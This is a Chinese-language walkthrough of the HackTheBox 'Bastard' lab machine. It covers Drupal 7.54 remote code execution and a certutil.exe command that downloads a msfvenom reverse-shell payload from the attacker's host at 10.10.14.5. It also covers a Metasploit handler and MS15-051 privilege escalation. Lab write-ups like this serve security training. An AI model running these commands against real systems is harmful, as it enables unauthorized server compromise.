1、靶机介绍
这次的靶机是Bastard。
2、信息收集
由于autorecon的速度比较慢,这里直接nmap -sC(默认脚本) -sS(快速扫描)过一下,80端口有个Drupal 7的标题,Drupal是个CMS具体的版本信息可以查看/CHANGELOG.txt。
首先确保这个80端口能正常访问
其次我们跟进一下可以看到版本为7.54
3、搜索payload,getshell前的准备
首先我们肯定是用searchsploit查看漏洞版本信息,而版本为7.54的话最好使用Drupal 7.x Module Services -RemoteCode Execution,这个通杀漏洞,不过这个我使用失败了。
这里上网找了一下有一个相关的Drupal的RCE漏洞的CVE编号,并且有很多不同的payload。
在github上找了一下下载链接在附件,或者是直接上GitHub上漏洞编号就行了。
看了一下是python3的格式,并需要安装好以下的库才能顺利执行。
4、getshell进行中
此时直接一个python 文件名 -cwhoami成功执行。
或者是dir可列出当前目录下的文件名,并指导当前目录为C:\inetpub\drupal-7.54。
那目前的想法是创建一个新目录,然后生成恶意文件传上去一个运行接收shell回来(建议最好创建一个文件夹,用powershell 的远程传文件python表示传输成功,但不知道把文件传到哪了)。首先使用mkdir创建一个cunfang文件夹先:
关于传文件这里在网上找了一下,还有一个CertUtil.exe的内置程序方便点,格式为: certutil.exe -urlcache -split -f http://ip:端口/文件名。
此时顺便用msfVENOM生成一个.exe的马
用刚才的payload用certutil.exe-urlcache -split -f
http://10.10.14.5:8080/makabaka.exe把文件传上去(这里的ip是开了python共享模式的kali IP)
此时打开我们的MSF使用exploit/multi/handler经典模块,设置好kali的IP和端口顺便把payload设置为
windows/x64/shell/reverse_tcp以后使用run开始监听。
此时用回payload 远程执行,如上图所示直接接收shell成功。
这里拿到user的flag
5、提权
提权我打算用MSF的自带提权payload,然而连脚本也可以区分欧皇和非酋了。
这里我为了多一个shell控制以防卡死再生成一个shell。
用上面的方法添加多一个shell出来,出现meterpreter就是代表成功。
先使用background退出去,注意看session,然后使用
post/multi/recon/local_exploit_suggester模块,设置好session以后run,跟大佬一起做。
他是30个exploit check,我是20个还顺便对比了一下他扫的东西比我多。
再扫一次MSF直接崩了。
无果可以根据systeminfo可知,这是windows 2008 R2,可以使用大杀器MS15-051针对Windows Server 2008 R2。
可以理解为49298大杀器通杀之前的靶机。
这里要到github上搜一下下载,然后用同样的方法certutil.exe传上去。
此时一波.exe whoami执行成功。
但是,这时能变换最高权限只有在运行.exe +命令的情况下才行:
所以我把shell.exe之前生成的恶意文件拿出来,再用MSF监听。
此时,真正变为管理员能爬到管理员那里拿root的flag。
以上为今天分享的内容,小伙伴们看懂了吗?
Original: https://www.cnblogs.com/ichunqiu/p/15955931.html
Author: i春秋
Title: HTB靶场记录之Bastard
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/551927/
转载文章受原作者版权保护。转载请注明原作者出处!